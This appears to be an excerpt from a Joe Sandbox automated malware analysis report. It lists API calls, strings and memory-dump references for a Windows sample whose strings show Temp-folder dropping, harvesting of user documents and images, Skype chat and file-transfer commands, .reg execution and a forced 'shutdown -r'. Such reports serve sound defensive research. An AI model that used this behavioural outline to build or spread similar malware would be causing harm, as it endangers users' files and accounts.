                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041312D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413150
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004131AA
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000003), ref: 004131D0
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004131E8
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\), ref: 00413218
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000027), ref: 00413227
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413249
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00413255
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004132AE
                                                                                                                                                                                                                                                        • Part of subcall function 004015BB: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004015F4
                                                                                                                                                                                                                                                        • Part of subcall function 004015BB: ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040160B
                                                                                                                                                                                                                                                        • Part of subcall function 004015BB: CloseHandle.KERNEL32(00000000), ref: 00401612
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413321
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413342
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FD), ref: 0041336A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 00413378
                                                                                                                                                                                                                                                      • InternetGetConnectedState.WININET(?,00000000), ref: 0041337F
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004133E3
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413406
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe, xrefs: 0041302D, 004131EF
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0041320C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleep$File$CloseConnectedCreateHandleInternetReadStatelstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 2589685863-1343724464
                                                                                                                                                                                                                                                      • Opcode ID: b31ac0d480c363e4102ade8ff76a0215a76fb5044318200e4b3b47ad19a756fb
                                                                                                                                                                                                                                                      • Instruction ID: b377c5010cb92b842955c200201b203a8470812258737c0f6d08faac805126b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b31ac0d480c363e4102ade8ff76a0215a76fb5044318200e4b3b47ad19a756fb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCC1D131804349DADB21EFA4D9457EEBBB0AB05316F24046FD814A3292DBBC9EC5C75E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$FileFind$lstrcpywsprintf$CloseCopyFirstNextSleep
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.3gp$.bmp$.doc$.gif$.jpeg$.jpg$.ppt$.rtf$.txt$.xls
                                                                                                                                                                                                                                                      • API String ID: 410483186-4223433645
                                                                                                                                                                                                                                                      • Opcode ID: 1bcf79c679bfb750c70df176564b50a258270a4ebb8da8457167ef855b4bdc68
                                                                                                                                                                                                                                                      • Instruction ID: 8443bdfcda034cd6fdbb2585da044ab3805babf66fc6f46138fa2843509b9348
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bcf79c679bfb750c70df176564b50a258270a4ebb8da8457167ef855b4bdc68
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A55174B29043589BDF25DBA0ED49BDE77ACEB08315F5400ABFD04E2190E778DB948B19
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0041EE25
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0041EBD9,00000000,00000000,00000000), ref: 0041EE92
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041EEB2
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(0045B918,?,00000001), ref: 0041EEF0
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(0045B104,0045B92A), ref: 0041F06D
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041F0D1
                                                                                                                                                                                                                                                        • Part of subcall function 0041D1B7: lstrlenA.KERNEL32(00000002), ref: 0041D1D8
                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0041F0EF
                                                                                                                                                                                                                                                      • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0041F101
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePostQuit$CountCreateNtdllProc_ThreadTickWindowlstrcpylstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                      • String ID: CALL $CHAT $CHATMESSAGE $CHATS $CURRENTUSERHANDLE $FILETRANSFER $MESSAGE $PONG$PROFILE $SET CALL %s STATUS FINISHED$SET USERSTATUS DND$UI_LANGUAGE $USER $USERS
                                                                                                                                                                                                                                                      • API String ID: 2230958134-1409954666
                                                                                                                                                                                                                                                      • Opcode ID: 888936b5bfeabbe3d83433d343771e4eec9ac341bedf05c1293056f138848fca
                                                                                                                                                                                                                                                      • Instruction ID: ff1e2bf0f8754b3fd09514ce30ef34bff699cb29bf99f05bcf49ffc9983ba451
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 888936b5bfeabbe3d83433d343771e4eec9ac341bedf05c1293056f138848fca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83712CB5B40310F6D7205B22EC42FDB3BA4EB15709F544037FD01A1293E76D9A8A869F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • htons.WS2_32(00000000), ref: 00412263
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0041228F
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004122A0
                                                                                                                                                                                                                                                      • bind.WS2_32(00000000,?,00000010), ref: 004122B4
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00412699
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: closesocket$bindhtonssocket
                                                                                                                                                                                                                                                      • String ID: GET
                                                                                                                                                                                                                                                      • API String ID: 1339886155-3027191851
                                                                                                                                                                                                                                                      • Opcode ID: 668f9fc0e6b1926bede2e661f5c29ac8492686b19c3ee1bbfc58fa61b5cf8c33
                                                                                                                                                                                                                                                      • Instruction ID: d311fc27eb13a375107f39839a4af2a922eccf7441768b3d5e47e018ee900ff6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 668f9fc0e6b1926bede2e661f5c29ac8492686b19c3ee1bbfc58fa61b5cf8c33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D11471910214EFCF149F64ED88AEE77B8FB09355F10012BE516E2291DBB89DA1CB2D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041C1BB
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C1CB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(skype.exe), ref: 0041C1E8
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C1EA
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C270
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 0041C29E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041C2A7
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C2BD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E7), ref: 0041C2DF
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C2E1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 0041C303
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 0041C318
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 0041C327
                                                                                                                                                                                                                                                        • Part of subcall function 00414776: EnumWindows.USER32(Function_0001470D,?), ref: 00414780
                                                                                                                                                                                                                                                        • Part of subcall function 0041411E: GetTickCount.KERNEL32 ref: 0041411E
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045A330), ref: 0041C372
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00463AB4), ref: 0041C379
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045B020), ref: 0041C380
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041C387
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0041C62E,00000000,00000000,00000000), ref: 0041C4AC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004218D6,00000000,00000000,00000000), ref: 0041C4B8
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0041C4C4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CountTick$CriticalInitializeSection$CreateThread$EnumWindows
                                                                                                                                                                                                                                                      • String ID: skype.exe
                                                                                                                                                                                                                                                      • API String ID: 147955496-1432977592
                                                                                                                                                                                                                                                      • Opcode ID: ae0dd1a123f94e77d99d4edb2041086986a7eea2d600e26643077ea6de868743
                                                                                                                                                                                                                                                      • Instruction ID: da50cea28471ff58dfe6edcfae1584a9064ff1a257102cfc2779c5ee05b94594
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae0dd1a123f94e77d99d4edb2041086986a7eea2d600e26643077ea6de868743
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D77129B09C8358BEE620A7619CC2BFB375CE70675AF04056BB90956183D77C8CC58A6F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$Findwsprintf$Filelstrcat$CloseFirstNextSleeplstrcmpilstrcpy
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.exe
                                                                                                                                                                                                                                                      • API String ID: 1622304240-2151574129
                                                                                                                                                                                                                                                      • Opcode ID: dce88a7abbee3731f9dce0cf2455fae8e9f5e9e5ada58549f6767937096a1e83
                                                                                                                                                                                                                                                      • Instruction ID: b2f26f08b693f8bac722b2e922d27ab4f1d63144c6233fabb21fea4b541305d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dce88a7abbee3731f9dce0cf2455fae8e9f5e9e5ada58549f6767937096a1e83
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA51E6B290421CABDF20DFA4DC44EDA77ACAF04314F1044A7FD09E2151DB39EA998F65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00415C2B: EnumProcesses.PSAPI(?,00001000,?), ref: 00415C48
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00415D9E
                                                                                                                                                                                                                                                        • Part of subcall function 00415C5F: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 00415CA3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00415DC1
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00415DD4
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 00415DF0
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,-00000005), ref: 00415E07
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.reg), ref: 00415E23
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 00415E3F
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00015C11,00000000,00000000,00000000), ref: 00415E54
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00415E5A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 00415E80
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(shutdown -r), ref: 00415E93
                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,Please restart your computer.,Shutdown,00000010), ref: 00415EA2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 00415EA9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CountTick$CreateEnumExecuteMessageOpenProcessesShellThreadlstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: .reg$C:\Users\user\AppData\Local\Temp\$Please restart your computer.$Shutdown$shutdown -r
                                                                                                                                                                                                                                                      • API String ID: 3291655182-1724939203
                                                                                                                                                                                                                                                      • Opcode ID: 45a0bc913c3db0820dd0f5aff22c820abbf664c53c8f46483399ef9e7f3ecb88
                                                                                                                                                                                                                                                      • Instruction ID: f5b4bd09b82acead4b5e9d0ab87140c6dd98665664e3eee1d4988e245c3d49ea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45a0bc913c3db0820dd0f5aff22c820abbf664c53c8f46483399ef9e7f3ecb88
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8021D6B2604305EFD310BFA0EC89DDF369CAB80344F50082AF905D2142EAAC899586BF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005,?,?,00000000), ref: 004092E3
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00409304
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00409318
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040932F
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00409379
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000026), ref: 004093C7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004093D5
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004093E5
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 00409414
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00409427
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040943E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Findwsprintf$Filelstrcatlstrcpylstrlen$CloseFirstNextSleep
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s*$%s\*$.$.exe
                                                                                                                                                                                                                                                      • API String ID: 726025564-1488415943
                                                                                                                                                                                                                                                      • Opcode ID: f85af95b27df55c0ed87ac530051f9fc08faa1526708873ecf1bcf0a6831bfd3
                                                                                                                                                                                                                                                      • Instruction ID: 8a5b5f6320cb998d4a51ea96e090637559c7b13efd41aa9022c31fab5c575317
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f85af95b27df55c0ed87ac530051f9fc08faa1526708873ecf1bcf0a6831bfd3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F41837690421DABCF219FA0DD88EDA7B6CEF14314F4400A2FD08E2191D779DEA68F95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0040726C
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00407287
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040729A
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004072FA
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,.rar), ref: 0040732A
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 00407334
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040734C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00407359
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040737A
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,00000010), ref: 004073AB
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
